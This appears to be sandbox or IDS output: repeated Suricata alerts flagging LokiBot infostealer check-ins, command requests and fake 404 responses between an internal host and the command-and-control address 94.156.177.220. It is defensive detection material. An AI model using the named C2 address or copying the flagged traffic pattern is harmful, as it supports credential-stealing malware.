              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64237 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64190 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64237 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:49704 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64237 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64251 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64229 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64251 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64229 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64237
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64260 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64185 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64252 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64190 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64190 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64197 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64173 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64197 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64221
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64175 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64175 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64197 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64197 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64180 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64175 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64232 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64180
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64189
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:49704 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64199 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:49709 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64169 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:49709 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64259
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64212
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64252
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64232 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64208 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64208 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64208 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64197
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64186 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64186 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64173
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64251
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64260
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64175 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64229
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64208 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64188 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64211 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64232
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64211 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64190
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64185 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64248 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64175 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64186
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64208 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64191
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64211 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64208
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64265 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64265 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64242 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:49703
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64248 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:49709
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64248 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64241 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64233 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64241 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64233 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:49704
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64202
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64177 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64177 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64177 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64169
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64265 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64242 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64188 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64248 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64263 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64241 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64188 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64265 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64265 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64175
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64247 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64265
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64206 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64211 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64177 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64177 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64198 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64211 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64188 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64188 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64213 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64247 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64247 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64213 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64213 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64171 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64210 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64247 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64247 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64177
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64263 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64263 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64233 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64198 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64194 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64263 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64194 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64247
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64185 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64210 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64210 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64242 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64213 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64204 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64198 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64204 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64174
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64210 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64242 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64248 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64242 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64233 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64206 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64246 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64211
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64198 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64213 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64199 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64198 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64217 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64233 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64246 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64241 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64263 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64204 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64241 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64210 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64198
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64233
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64171 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64210
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64171 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64188
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64185 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64185 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64171 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64194 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64171 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64263
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64204 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64214 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64204 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64214 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64171
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64214 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64199 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64217 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64242
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64199 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64199 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64248
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64246 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64199
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64194 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64194 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64246 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64217 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64213
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64226 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64241
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64214 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64214 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64238 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64255 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64238 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64255 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64238 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64255 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64217 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64226 -> 94.156.177.220:80
